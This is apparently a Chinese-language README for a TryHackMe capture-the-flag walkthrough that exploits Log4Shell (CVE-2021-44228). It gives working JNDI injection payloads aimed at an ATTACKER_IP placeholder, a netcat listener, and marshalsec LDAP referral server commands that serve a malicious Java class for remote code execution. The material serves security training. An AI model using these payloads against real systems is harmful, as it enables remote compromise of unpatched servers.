该仓库提供了TryHackMe上*Solar Exploiting Log4j房间*的详细演练,重点是利用关键的Log4Shell漏洞 (CVE-2021-44228)。该项目演示了攻击者如何利用Java应用程序中不安全的日志记录机制实现远程代码执行。
平台: TryHackMe 难度: 中等 主题: Log4Shell (Log4j漏洞)
利用Log4j漏洞(CVE-2021-44228)获取远程代码执行并捕获旗帜。
nmap -sC -sV <TARGET_IP>
Log4j漏洞允许JNDI注入:
${jndi:ldap://<ATTACKER_IP>:1389/a}
如果输入被记录 → 存在漏洞。
nc -lvnp 4444
git clone https://github.com/mbechler/marshalsec
cd marshalsec
mvn clean package
运行LDAP服务器:
java -cp target/marshalsec.jar marshalsec.jndi.LDAPRefServer "http://<ATTACKER_IP>:8000/#Exploit" 1389
python3 -m http.server 8000
创建恶意Java类 (Exploit.class)
将payload注入到易受攻击的字段中:
${jndi:ldap://<ATTACKER_IP>:1389/Exploit}
💡 使用类似以下头部:
一旦触发:
检查:
sudo -l
查找:
find / -name flag.txt 2>/dev/null
cat flag.txt